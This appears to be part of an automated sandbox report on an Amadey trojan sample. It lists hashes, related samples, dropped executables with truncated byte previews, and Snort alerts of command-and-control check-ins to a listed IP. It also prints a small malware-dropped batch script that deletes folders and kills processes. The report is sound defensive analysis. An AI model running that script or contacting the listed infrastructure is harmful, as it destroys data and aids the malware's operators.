                                        VunjeCGYgU.exeGet hashmaliciousBrowse
                                        • 162.159.135.233
                                        kBZehvBJYd.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        u6qq59Oq6y.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        1Ps8424by8.exeGet hashmaliciousBrowse
                                        • 162.159.135.233
                                        2wETbdUIFc.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        ltnIYd33yU.exeGet hashmaliciousBrowse
                                        • 162.159.135.233
                                        apgKDBpMxB.exeGet hashmaliciousBrowse
                                        • 162.159.135.233
                                        Fh6agmYian.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        PDF.FILE#1145523.vbsGet hashmaliciousBrowse
                                        • 162.159.134.233

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        CLOUDFLARENETUSLunar_Builder.exeGet hashmaliciousBrowse
                                        • 162.159.128.233
                                        Lunar_Builder.exeGet hashmaliciousBrowse
                                        • 162.159.128.233
                                        order#455523.vbsGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        EarZA1AonY.exeGet hashmaliciousBrowse
                                        • 104.20.139.65
                                        Renetry Hack.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        update_1630227239.dllGet hashmaliciousBrowse
                                        • 104.26.6.139
                                        uvVLne3r48.exeGet hashmaliciousBrowse
                                        • 172.67.70.188
                                        gMWaIDKK37.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        hsRrR2KPY7.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        pCSou0ozZy.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        ZUd8KSXXVD.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        k2vbB70cV7.exeGet hashmaliciousBrowse
                                        • 162.159.129.233
                                        OCrlOxN8uU.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        kATDFWvtje.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        swiftcr.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        Y54o1vpvV6.exeGet hashmaliciousBrowse
                                        • 162.159.135.232
                                        m5qTThXEqm.exeGet hashmaliciousBrowse
                                        • 104.20.138.65
                                        isgRMqD3Bq.exeGet hashmaliciousBrowse
                                        • 172.67.1.225
                                        z5YaDxVg34.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        VunjeCGYgU.exeGet hashmaliciousBrowse
                                        • 162.159.135.233
                                        HOSTKEY-ASNLyTQtsgFHGJ.exeGet hashmaliciousBrowse
                                        • 46.17.96.37
                                        Reciept_20438048.xlsbGet hashmaliciousBrowse
                                        • 5.39.222.102
                                        iexploer.dllGet hashmaliciousBrowse
                                        • 185.70.187.157
                                        CB3LL2QQ2zGet hashmaliciousBrowse
                                        • 146.0.75.242
                                        dnGR8gtOGzGet hashmaliciousBrowse
                                        • 146.0.75.242
                                        7sJzXufsLXGet hashmaliciousBrowse
                                        • 146.0.75.242
                                        SC7rDNvnQTGet hashmaliciousBrowse
                                        • 146.0.75.242
                                        41A4G2WNM8Get hashmaliciousBrowse
                                        • 146.0.75.242
                                        VShwID8czjGet hashmaliciousBrowse
                                        • 146.0.75.242
                                        xIqrTQD303Get hashmaliciousBrowse
                                        • 146.0.75.242
                                        XXCWTa4VF5Get hashmaliciousBrowse
                                        • 146.0.75.242
                                        3jAYAlao61Get hashmaliciousBrowse
                                        • 146.0.75.242
                                        5aXIxJSlQRGet hashmaliciousBrowse
                                        • 146.0.75.242
                                        4jirZDIFcwGet hashmaliciousBrowse
                                        • 146.0.75.242
                                        LoEJZuB1rjGet hashmaliciousBrowse
                                        • 146.0.75.242
                                        2lhUTWHfEOGet hashmaliciousBrowse
                                        • 146.0.75.242
                                        YdoNZNLdmTGet hashmaliciousBrowse
                                        • 146.0.75.242
                                        RCtGSDwbmAGet hashmaliciousBrowse
                                        • 146.0.75.242
                                        7wvqRzUsBUGet hashmaliciousBrowse
                                        • 146.0.75.242
                                        eCAEzO56H2Get hashmaliciousBrowse
                                        • 146.0.75.242

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\mvoElayshk.exe.log
                                        Process:C:\Users\user\Desktop\mvoElayshk.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):660
                                        Entropy (8bit):5.390020766762198
                                        Encrypted:false
                                        SSDEEP:12:Q3La/KDLI4MWuPTxAI51KDLI4MN5P6D1BakvoDLI4MWuPak2kL0nk7v:ML9E4KrL1qE4GiD0E4KeGj
                                        MD5:ED176F7B2A92AFE2E5D2FE638497B180
                                        SHA1:AC0CE61B4C1398CE766F3C34269C7B6AEDE78926
                                        SHA-256:08EDDC037583A4B1815D4FBC4A4CA7356BF81A7F7D5E72F1EBA6289474D94B65
                                        SHA-512:A83D3A4E144576DB06390142ECAF7527D858635FA5DF9CD6ABB7DA67CA91D8647216088023E9C79A06D1DC6BCAE380DE11175B2DA85A5C44E1ABBAB0330BCB06
                                        Malicious:true
                                        Reputation:unknown
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\1sb1iwyem7[1].exe
                                        Process:C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):5
                                        Entropy (8bit):1.5219280948873621
                                        Encrypted:false
                                        SSDEEP:3:hn:h
                                        MD5:FDA44910DEB1A460BE4AC5D56D61D837
                                        SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
                                        SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
                                        SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: 0....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\5mgcqk6jl[1].exe
                                        Process:C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):5
                                        Entropy (8bit):1.5219280948873621
                                        Encrypted:false
                                        SSDEEP:3:hn:h
                                        MD5:FDA44910DEB1A460BE4AC5D56D61D837
                                        SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
                                        SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
                                        SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: 0....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\1sb1iwyem7[1].exe
                                        Process:C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):257266
                                        Entropy (8bit):7.467212933185433
                                        Encrypted:false
                                        SSDEEP:6144:j5VP9Ge3+hoAvdeJBBLncZ0+JPC3SFEXBmbJyvUbclQaLZEHVzNoyn:j5393whFOBBz+NdFEXEJyMmJL+5oyn
                                        MD5:8AB82DE9E761FA26308DAC69D6B855A6
                                        SHA1:BF48F2128E9F534F196CDB7516BE14A16B1A4364
                                        SHA-256:584C532790655A559EE84DA2FD1E78FC6F1C462FA8CBBBFA078A71F0FB82BAAC
                                        SHA-512:6A959D9E30D5F7F5CD7B8F59CF78AFDC0F53F09137DA240D360CDD5D34C939B0E074EE0DACA4DA01E1180AC8D90E268912382CEDDBC3573711D1EB4DD29602DF
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 57%
                                        Reputation:unknown
                                        Preview: MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...JD.W............................_.............@.................................................................................p..MN...........................................................................................................text...J........................... ..`.rdata...A.......B..................@..@.data....L... ......................@....rsrc...MN...p...P..................@..@........VQ....l.A.......%.........^.V...e....@.A..F8......^.j..q.....A..V........N\..p.A..7...F8......^.V...ee......A..F8......^.3....U...h.M......h'B...u.j,Y.A,..V.5.(B..M.P.5d'B.j..h....t-.u...'B..7..3....'B..F.u....Y.M..Me....^.....'B.3...VWj...Y3...._...^.V...v\.P...Y....e...D$..t.V.;...Y..^....=.'B..V..u...t'B..u..:.....u...@..^...'B...^....U..Q.A..e.....U.RP.Q..E...U..U.SV.u.W3.j.Y.$.A.3...t..u.j.Y.0.A.3..u..M.;.t..A....A.3.....@.._^[]....L$..I..A.u.Q...Y3.....l$......
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\5mgcqk6jl[1].exe
                                        Process:C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):238319
                                        Entropy (8bit):7.390286232132312
                                        Encrypted:false
                                        SSDEEP:6144:t5VP9Ge3+hoAvdeJBBLncZZRiu+EGRV+kMDU9Gaz:t5393whFOBBmYu+E2VXMDbE
                                        MD5:EC0FC802166AE83C519C5AEA89D65A53
                                        SHA1:CAEFB02DC62F18F9B3429974C348A6BDE08E7D64
                                        SHA-256:F6311D337EFDC5C227FEBD1E8E36079B7CACF31AEEBB5888AEC2877BF3EE2F6A
                                        SHA-512:A254F9904C096D66CD26FEBC45697691995AD43C86E73CDECA3412228C665D6145829AF59CC135BBF242E12929EAB39A9C2928DD3D3F8BA32423D8FCE1AB59BC
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Metadefender, Detection: 15%, Browse
                                        • Antivirus: ReversingLabs, Detection: 57%
                                        Reputation:unknown
                                        Preview: MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...JD.W............................_.............@..................................................................................p...M...........................................................................................................text...J........................... ..`.rdata...A.......B..................@..@.data....L... ......................@....rsrc....M...p...N..................@..@........VQ....l.A.......%.........^.V...e....@.A..F8......^.j..q.....A..V........N\..p.A..7...F8......^.V...ee......A..F8......^.3....U...h.M......h'B...u.j,Y.A,..V.5.(B..M.P.5d'B.j..h....t-.u...'B..7..3....'B..F.u....Y.M..Me....^.....'B.3...VWj...Y3...._...^.V...v\.P...Y....e...D$..t.V.;...Y..^....=.'B..V..u...t'B..u..:.....u...@..^...'B...^....U..Q.A..e.....U.RP.Q..E...U..U.SV.u.W3.j.Y.$.A.3...t..u.j.Y.0.A.3..u..M.;.t..A....A.3.....@.._^[]....L$..I..A.u.Q...Y3.....l$......
                                        C:\Users\user\AppData\Local\Temp\152138533219
                                        Process:C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                        Category:dropped
                                        Size (bytes):17078614
                                        Entropy (8bit):7.92588991489629
                                        Encrypted:false
                                        SSDEEP:98304:qfPfPf2AAGammmmmmmmm6QOXz1AAAA4JAAAAAAAE:cXXgDi
                                        MD5:FA87787104B49B2ECFF0511DBEE27E97
                                        SHA1:6A4F22405BCCC43986FBEB2D3551F818726131E4
                                        SHA-256:7EF5867CA358DD88BDCAB3BE43F92B7BD0D6FFD1E3CA710DCAC41593E2CAC949
                                        SHA-512:1782A917F15717204096F600E99B7C0EC25A5FA43039DEAE590C13CA3F077B75E58BAC8998E687E0C8BDFDB8F58DE56A73F6B752ADCDDD25C4D87881846A2B83
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....
                                        C:\Users\user\AppData\Local\Temp\15213853321935212556
                                        Process:C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        File Type:empty
                                        Category:dropped
                                        Size (bytes):0
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:D41D8CD98F00B204E9800998ECF8427E
                                        SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                        SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                        SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:
                                        C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe
                                        Process:C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):257266
                                        Entropy (8bit):7.467212933185433
                                        Encrypted:false
                                        SSDEEP:6144:j5VP9Ge3+hoAvdeJBBLncZ0+JPC3SFEXBmbJyvUbclQaLZEHVzNoyn:j5393whFOBBz+NdFEXEJyMmJL+5oyn
                                        MD5:8AB82DE9E761FA26308DAC69D6B855A6
                                        SHA1:BF48F2128E9F534F196CDB7516BE14A16B1A4364
                                        SHA-256:584C532790655A559EE84DA2FD1E78FC6F1C462FA8CBBBFA078A71F0FB82BAAC
                                        SHA-512:6A959D9E30D5F7F5CD7B8F59CF78AFDC0F53F09137DA240D360CDD5D34C939B0E074EE0DACA4DA01E1180AC8D90E268912382CEDDBC3573711D1EB4DD29602DF
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 57%
                                        Reputation:unknown
                                        Preview: MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...JD.W............................_.............@.................................................................................p..MN...........................................................................................................text...J........................... ..`.rdata...A.......B..................@..@.data....L... ......................@....rsrc...MN...p...P..................@..@........VQ....l.A.......%.........^.V...e....@.A..F8......^.j..q.....A..V........N\..p.A..7...F8......^.V...ee......A..F8......^.3....U...h.M......h'B...u.j,Y.A,..V.5.(B..M.P.5d'B.j..h....t-.u...'B..7..3....'B..F.u....Y.M..Me....^.....'B.3...VWj...Y3...._...^.V...v\.P...Y....e...D$..t.V.;...Y..^....=.'B..V..u...t'B..u..:.....u...@..^...'B...^....U..Q.A..e.....U.RP.Q..E...U..U.SV.u.W3.j.Y.$.A.3...t..u.j.Y.0.A.3..u..M.;.t..A....A.3.....@.._^[]....L$..I..A.u.Q...Y3.....l$......
                                        C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd
                                        Process:C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):222
                                        Entropy (8bit):4.855194602218789
                                        Encrypted:false
                                        SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                        MD5:68CECDF24AA2FD011ECE466F00EF8450
                                        SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                        SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                        SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f
                                        C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        Process:C:\Users\user\AppData\Local\Temp\a.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):203264
                                        Entropy (8bit):6.469979435235171
                                        Encrypted:false
                                        SSDEEP:3072:W1/1YsM8E0YD0ixsstk7bRs4GxbVr9r+zHG/2zZNuAKq3mUhbwHMNwlWXc4Emi:W19Y0/ixsNHK4GxV192/uAKq/Ylec
                                        MD5:F8899BB72B91E110CD5D6DA17861369C
                                        SHA1:4339827E0FE824D85404D2EF11533612FD4CE6B2
                                        SHA-256:CFF537E4A1E866D2B159BA165511AAFE2298AAE94836B3165A2B42A1E7CF3DE5
                                        SHA-512:C03E53F5CEC7F112F85865EBE8432D2516A63051707B9AB3AAE7FCFBDDC8DD3788570A9B47B174F48119FD87FF87172D6C0D65ED35605F7C5854BA9DEFAAF80D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 62%
                                        Reputation:unknown
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................:........p....p....p...........:...>....>.X...>....Rich............................PE..L....M&a.................^...................p....@.......................................@.................................x........P.......................`...... ...p...............................@............p..T............................text...V\.......^.................. ..`.rdata.. ....p.......b..............@..@.data...tE..........................@....rsrc........P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe
                                        Process:C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):238319
                                        Entropy (8bit):7.390286232132312
                                        Encrypted:false
                                        SSDEEP:6144:t5VP9Ge3+hoAvdeJBBLncZZRiu+EGRV+kMDU9Gaz:t5393whFOBBmYu+E2VXMDbE
                                        MD5:EC0FC802166AE83C519C5AEA89D65A53
                                        SHA1:CAEFB02DC62F18F9B3429974C348A6BDE08E7D64
                                        SHA-256:F6311D337EFDC5C227FEBD1E8E36079B7CACF31AEEBB5888AEC2877BF3EE2F6A
                                        SHA-512:A254F9904C096D66CD26FEBC45697691995AD43C86E73CDECA3412228C665D6145829AF59CC135BBF242E12929EAB39A9C2928DD3D3F8BA32423D8FCE1AB59BC
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Metadefender, Detection: 15%, Browse
                                        • Antivirus: ReversingLabs, Detection: 57%
                                        Reputation:unknown
                                        Preview: MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...JD.W............................_.............@..................................................................................p...M...........................................................................................................text...J........................... ..`.rdata...A.......B..................@..@.data....L... ......................@....rsrc....M...p...N..................@..@........VQ....l.A.......%.........^.V...e....@.A..F8......^.j..q.....A..V........N\..p.A..7...F8......^.V...ee......A..F8......^.3....U...h.M......h'B...u.j,Y.A,..V.5.(B..M.P.5d'B.j..h....t-.u...'B..7..3....'B..F.u....Y.M..Me....^.....'B.3...VWj...Y3...._...^.V...v\.P...Y....e...D$..t.V.;...Y..^....=.'B..V..u...t'B..u..:.....u...@..^...'B...^....U..Q.A..e.....U.RP.Q..E...U..U.SV.u.W3.j.Y.$.A.3...t..u.j.Y.0.A.3..u..M.;.t..A....A.3.....@.._^[]....L$..I..A.u.Q...Y3.....l$......
                                        C:\Users\user\AppData\Local\Temp\a.exe
                                        Process:C:\Users\user\Desktop\mvoElayshk.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):203264
                                        Entropy (8bit):6.469979435235171
                                        Encrypted:false
                                        SSDEEP:3072:W1/1YsM8E0YD0ixsstk7bRs4GxbVr9r+zHG/2zZNuAKq3mUhbwHMNwlWXc4Emi:W19Y0/ixsNHK4GxV192/uAKq/Ylec
                                        MD5:F8899BB72B91E110CD5D6DA17861369C
                                        SHA1:4339827E0FE824D85404D2EF11533612FD4CE6B2
                                        SHA-256:CFF537E4A1E866D2B159BA165511AAFE2298AAE94836B3165A2B42A1E7CF3DE5
                                        SHA-512:C03E53F5CEC7F112F85865EBE8432D2516A63051707B9AB3AAE7FCFBDDC8DD3788570A9B47B174F48119FD87FF87172D6C0D65ED35605F7C5854BA9DEFAAF80D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 62%
                                        Reputation:unknown
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................:........p....p....p...........:...>....>.X...>....Rich............................PE..L....M&a.................^...................p....@.......................................@.................................x........P.......................`...... ...p...............................@............p..T............................text...V\.......^.................. ..`.rdata.. ....p.......b..............@..@.data...tE..........................@....rsrc........P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):6.451726149263706
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:mvoElayshk.exe
                                        File size:209408
                                        MD5:231c758869bf91299b69a8aae619aa48
                                        SHA1:33f0e34d02c2a2fbe76a8d80148c9b3bb9647656
                                        SHA256:6a5c86378beea3c4aef5f4a88b8367b1f4a6a7a4578646c081712f2ddda5192f
                                        SHA512:5363863a319598fc33abdd6d4d876e8e59e143de277e2c3cd3db7110407a01ddd3224c7dff044dcd8be63d2d457c15f5ad8d0d544aa91704bffb9b15ac3eb058
                                        SSDEEP:3072:I1/1YsM8E0YD0ixsstk7bRs4GxbVr9r+zHG/2zZNuAKq3mUhbwHMNwlWXc4EmioN:I19Y0/ixsNHK4GxV192/uAKq/Ylec
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....'a.................(...........G... ...`....@.. ....................................@................................

                                        File Icon

                                        Icon Hash:00828e8e8686b000

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        08/29/21-22:27:08.914541TCP2027700ET TROJAN Amadey CnC Check-In4973580192.168.2.446.17.96.36
                                        08/29/21-22:27:40.733958TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.446.17.96.36
                                        08/29/21-22:27:40.957470TCP2027700ET TROJAN Amadey CnC Check-In4980580192.168.2.446.17.96.36
                                        08/29/21-22:27:41.143051TCP2027700ET TROJAN Amadey CnC Check-In4980480192.168.2.446.17.96.36
                                        08/29/21-22:27:41.436785TCP2027700ET TROJAN Amadey CnC Check-In4980680192.168.2.446.17.96.36
                                        08/29/21-22:27:41.665491TCP2027700ET TROJAN Amadey CnC Check-In4980880192.168.2.446.17.96.36
                                        08/29/21-22:27:41.918453TCP2027700ET TROJAN Amadey CnC Check-In4980980192.168.2.446.17.96.36
                                        08/29/21-22:27:42.215984TCP2027700ET TROJAN Amadey CnC Check-In4981180192.168.2.446.17.96.36
                                        08/29/21-22:27:42.498218TCP2027700ET TROJAN Amadey CnC Check-In4981380192.168.2.446.17.96.36
                                        08/29/21-22:27:42.782446TCP2027700ET TROJAN Amadey CnC Check-In4981480192.168.2.446.17.96.36
                                        08/29/21-22:27:43.033591TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.446.17.96.36
                                        08/29/21-22:27:43.265582TCP2027700ET TROJAN Amadey CnC Check-In4981780192.168.2.446.17.96.36
                                        08/29/21-22:27:43.514678TCP2027700ET TROJAN Amadey CnC Check-In4981980192.168.2.446.17.96.36
                                        08/29/21-22:27:43.750334TCP2027700ET TROJAN Amadey CnC Check-In4982080192.168.2.446.17.96.36
                                        08/29/21-22:27:43.973075TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.446.17.96.36
                                        08/29/21-22:27:44.230236TCP2027700ET TROJAN Amadey CnC Check-In4982380192.168.2.446.17.96.36
                                        08/29/21-22:27:44.496657TCP2027700ET TROJAN Amadey CnC Check-In4982580192.168.2.446.17.96.36
                                        08/29/21-22:27:44.719124TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.446.17.96.36
                                        08/29/21-22:27:44.935471TCP2027700ET TROJAN Amadey CnC Check-In4982880192.168.2.446.17.96.36
                                        08/29/21-22:27:45.161400TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.446.17.96.36
                                        08/29/21-22:27:45.407158TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.446.17.96.36
                                        08/29/21-22:27:45.628518TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.446.17.96.36
                                        08/29/21-22:27:45.870541TCP2027700ET TROJAN Amadey CnC Check-In4983480192.168.2.446.17.96.36
                                        08/29/21-22:27:46.574081TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.446.17.96.36
                                        08/29/21-22:27:46.811566TCP2027700ET TROJAN Amadey CnC Check-In4983680192.168.2.446.17.96.36
                                        08/29/21-22:27:47.049220TCP2027700ET TROJAN Amadey CnC Check-In4983880192.168.2.446.17.96.36
                                        08/29/21-22:27:47.310087TCP2027700ET TROJAN Amadey CnC Check-In4983980192.168.2.446.17.96.36
                                        08/29/21-22:27:47.537049TCP2027700ET TROJAN Amadey CnC Check-In4984180192.168.2.446.17.96.36
                                        08/29/21-22:27:47.769836TCP2027700ET TROJAN Amadey CnC Check-In4984380192.168.2.446.17.96.36
                                        08/29/21-22:27:47.991497TCP2027700ET TROJAN Amadey CnC Check-In4984480192.168.2.446.17.96.36
                                        08/29/21-22:27:48.238158TCP2027700ET TROJAN Amadey CnC Check-In4984580192.168.2.446.17.96.36
                                        08/29/21-22:27:48.456253TCP2027700ET TROJAN Amadey CnC Check-In4984680192.168.2.446.17.96.36
                                        08/29/21-22:27:48.691605TCP2027700ET TROJAN Amadey CnC Check-In4984780192.168.2.446.17.96.36
                                        08/29/21-22:27:48.944394TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.446.17.96.36
                                        08/29/21-22:27:49.178303TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.446.17.96.36
                                        08/29/21-22:27:49.396510TCP2027700ET TROJAN Amadey CnC Check-In4985180192.168.2.446.17.96.36
                                        08/29/21-22:27:49.615452TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.446.17.96.36
                                        08/29/21-22:27:49.860125TCP2027700ET TROJAN Amadey CnC Check-In4985480192.168.2.446.17.96.36
                                        08/29/21-22:27:50.132224TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.446.17.96.36
                                        08/29/21-22:27:50.362005TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.446.17.96.36
                                        08/29/21-22:27:50.600866TCP2027700ET TROJAN Amadey CnC Check-In4985880192.168.2.446.17.96.36
                                        08/29/21-22:27:50.851328TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.446.17.96.36
                                        08/29/21-22:27:51.074292TCP2027700ET TROJAN Amadey CnC Check-In4986180192.168.2.446.17.96.36
                                        08/29/21-22:27:52.574786TCP2027700ET TROJAN Amadey CnC Check-In4986380192.168.2.446.17.96.36
                                        08/29/21-22:27:52.841492TCP2027700ET TROJAN Amadey CnC Check-In4986480192.168.2.446.17.96.36
                                        08/29/21-22:27:53.114259TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.446.17.96.36
                                        08/29/21-22:27:53.348179TCP2027700ET TROJAN Amadey CnC Check-In4986880192.168.2.446.17.96.36
                                        08/29/21-22:27:53.580915TCP2027700ET TROJAN Amadey CnC Check-In4986980192.168.2.446.17.96.36
                                        08/29/21-22:27:53.800891TCP2027700ET TROJAN Amadey CnC Check-In4987080192.168.2.446.17.96.36
                                        08/29/21-22:27:54.037112TCP2027700ET TROJAN Amadey CnC Check-In4987180192.168.2.446.17.96.36
                                        08/29/21-22:27:55.386156TCP2027700ET TROJAN Amadey CnC Check-In4987280192.168.2.446.17.96.36
